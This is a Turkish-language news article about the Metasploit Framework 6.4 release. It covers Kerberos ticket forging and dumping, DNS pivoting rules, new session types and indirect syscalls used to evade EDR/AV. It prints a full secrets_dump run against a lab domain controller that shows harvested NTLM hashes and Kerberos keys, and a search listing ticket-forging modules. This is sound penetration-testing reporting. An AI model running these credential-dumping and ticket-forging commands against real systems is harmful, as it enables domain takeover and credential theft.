Metasploit Framework 6.4 Yayınlandı: Yenilikler


Metasploit Framework 6.4 Yayınlandı: Yenilikler

Metasploit'in en son sürümü olan Framework 6.4, devam eden bu savaşın bir kanıtıdır. Siber güvenliğin ön saflarına bir dizi yeni özellik ve iyileştirme getiriyor.

Metasploit'in 6.3 sürümünü yayınlamasından bu yana bir yıldan biraz fazla zaman geçti ve Rapid7'deki ekip boş durmadı.

Metasploit Framework'ün yeni 6.4 sürümü, selefinin sağlam temelleri üzerine inşa edilen önemli geliştirmeler ve yeni yetenekler sunuyor.

Bu sürüm, Metasploit'in penetrasyon test uzmanları ve siber güvenlik profesyonelleri için en yeni araçları sağlama konusundaki kararlılığının altını çiziyor.

Kerberos İyileştirmeleri

Bu sürümün öne çıkan özelliklerinden biri Kerberos kimlik doğrulama desteğinde yapılan önemli iyileştirmelerdir.

Sürüm 6.3'te sunulan ilk desteğin üzerine inşa edilen Metasploit 6.4, orijinal altın ve gümüş tekniklerinin yanı sıra elmas ve safir tekniklerine yönelik destek de dahil olmak üzere yeni yetenekler ekliyor.

Belge

Ücretsiz Web Semineri: Güvenlik Açığı ve 0 Günlük Tehditlerin Azaltılması

Güvenlik ekiplerinin 100'lerce güvenlik açığını önceliklendirmesi gerekmediğinden, hiç kimseye yardımcı olmayan Uyarı Yorgunluğu. :

  • Günümüzün kırılganlık yorgunluğu sorunu
  • CVSS'ye özgü güvenlik açığı ile risk tabanlı güvenlik açığı arasındaki fark
  • Güvenlik açıklarının iş etkisine/riskine göre değerlendirilmesi
  • Uyarı yorgunluğunu azaltmak ve güvenlik duruşunu önemli ölçüde geliştirmek için otomasyon

Riski doğru bir şekilde ölçmenize yardımcı olan AcuRisQ:


Bu güncelleme, en son Windows hedeflerine ayak uydurarak Windows Server 2022 ile uyumluluğu sağlar.

Rapid7'nin yakın tarihli bir makalesine göre Metasploit yakın zamanda Metasploit Framework 6.4'ün lansmanını duyurdu.

Ayrıca Metasploit 6.4, popüler Rubeus aracının sunduğu işlevselliğe benzer şekilde, kullanıcıların ele geçirilen bir ana bilgisayardan Kerberos biletlerini boşaltmasına olanak tanıyan yeni bir modül sunuyor.

Bu geliştirme, Kısıtlanmamış Yetkilendirme örneklerinden yararlanmak için faydalıdır ve siber güvenlik profesyonellerinin kullanabileceği araç setini daha da genişletir.

Çalıştırma örneği gather/windows_secrets_dump Kerberos kimlik doğrulamalı modül ve DOMAIN aksiyon:

msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN

[*] Running module against 192.168.123.133

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response

[*] 192.168.123.133:445 - Opening Service Control Manager

…

[*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response

[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin

[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response

[*] 192.168.123.133:445 - Bound to DRSR

[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local

[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local

# SID's:

Administrator: S-1-5-21-1242350107-3695253863-3717863007-500

…

# NTLM hashes:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::

…

# Full pwdump format:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::

…

# Kerberos keys:

Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6

…

[*] 192.168.123.133:445 - Cleaning up...

[*] Auxiliary module execution completed

Rapid7'de Baş Bilim Adamı olan Raj Samani, yakın zamanda Metasploit Çerçevesi'nin 6.4 versiyonunun başarılı bir şekilde yayınlanmasındaki olağanüstü çalışmaları için Metasploit ekibine ve topluluğuna şükranlarını ifade eden bir tweet attı.

DNS Yapılandırması ve Yeni Oturum Türleri

Bir diğer önemli gelişme ise Metasploit çerçevesinde DNS sorgularının geliştirilmiş şekilde işlenmesidir.

Bu güncelleme, kullanıcıların ana bilgisayar adlarının nasıl çözümleneceğini yapılandırmasına olanak tanır; bu, özellikle pivot senaryolarında faydalıdır.

Bu, dahili kaynaklara yönelik DNS sorgularının kullanıcının sistemi yerine güvenliği ihlal edilmiş bir ana bilgisayardan gelmesini sağlayarak operasyonel güvenliği artırır.

Metasploit 6.4 ayrıca yeni PostgreSQL, MSSQL, MySQL ve SMB oturum türlerini de sunuyor. Bu oturum türleri, uzak veritabanı örnekleriyle etkileşimli sorgulara ve dosya yükleme ve indirme yetenekleri de dahil olmak üzere SMB paylaşımlarıyla doğrudan etkileşime olanak tanır.

Bu ekleme, birden fazla modülün tek bir oturumda çalıştırılmasını kolaylaştırarak verimliliği ve etkililiği artırır.

DNS yapılandırmasını değiştirme örnekleri:

dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1

dns add --rule honeypot.lab.lan --index 2 black-hole

dns add-static example2.lab.lan 192.0.2.201

dns add --index 1 --rule * static system 192.0.2.1

Geçerli yapılandırmayı görüntüleme:


msf6 > dns print

Default search domain: N/A

Default search list:

  * tor.example.com

  * localdomain

Current cache size:    0

Resolver rule entries

=====================

   #  Rule              Resolver    Comm channel

   -  ----              --------    ------------

   1  *.lab.lan         192.0.2.1   Session 1

   2  honeypot.lab.lan  black-hole  N/A

   3  *

   .    \_              static      N/A

   .    \_              10.4.5.45

   .    \_              10.3.20.98

Static hostnames

================

   Hostname          IPv4 Address  IPv6 Address

   --------          ------------  ------------

   example.lab.lan   192.0.2.200

   example2.lab.lan  192.0.2.201

Dolaylı Sistem Çağrıları Desteği ve Keşfedilebilirlik İyileştirmeleri

Metasploit 6.4, güvenlik yazılımı tarafından EDR/AV tespitini atlamak ve dinamik analizden kaçınmak için sıklıkla kullanılan bir teknik olan dolaylı sistem çağrılarını destekler.

Bu güncelleme, Win32 API çağrılarını ilgili yerel API'lere dolaylı sistem çağrılarıyla değiştirmeye ve Metasploit ile yürütülen operasyonların gizliliğini artırmaya odaklanıyor.

Metasploit 6.4, kullanıcıların çerçeve içindeki geniş modül dizisinde gezinmesine yardımcı olmak için modül keşfedilebilirliğine yönelik iyileştirmeler sunar.

Yeni Hiyerarşik Arama özelliği, modüllerdeki ek alanları eşleştirerek kullanıcıların görevleri için ihtiyaç duydukları araçları bulmalarını kolaylaştırır.

Örnek olarak, bu şuna neden olacaktır: auxiliary/admin/kerberos/forge_ticket Kullanıcı aradığında görünecek modül forge_golden çünkü bu modülün bir eylemidir:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules

================

   #  Name                                                 Disclosure Date  Rank    Check  Description

   -  ----                                                 ---------------  ----    -----  -----------

   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging

   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket

   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket

   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket

   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket

   5    \_ AKA: Ticketer                                   .                .       .      .

   6    \_ AKA: Klist                                      .                .       .      .

   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

Interact with a module by name or index. 

For example, info 7, use 7 or use auxiliary/admin/Kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Metasploit Framework 6.4'ün piyasaya sürülmesi, en yaygın kullanılan penetrasyon testi araçlarından birinin geliştirilmesinde başka bir kilometre taşıdır.

Metasploit, yeni özellikleri ve iyileştirmeleriyle siber güvenlik profesyonellerini dijital dünyada sürekli gelişen tehditlere karşı korunmak için ihtiyaç duydukları araçlarla donatmaya devam ediyor.

Siber tehditlerin karmaşıklığı arttıkça, Metasploit Framework 6.4 gibi araçlar dünya çapındaki dijital altyapıların güvenliğini sağlamak için hayati öneme sahiptir.

Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn'de takip edin & heyecan.





Source link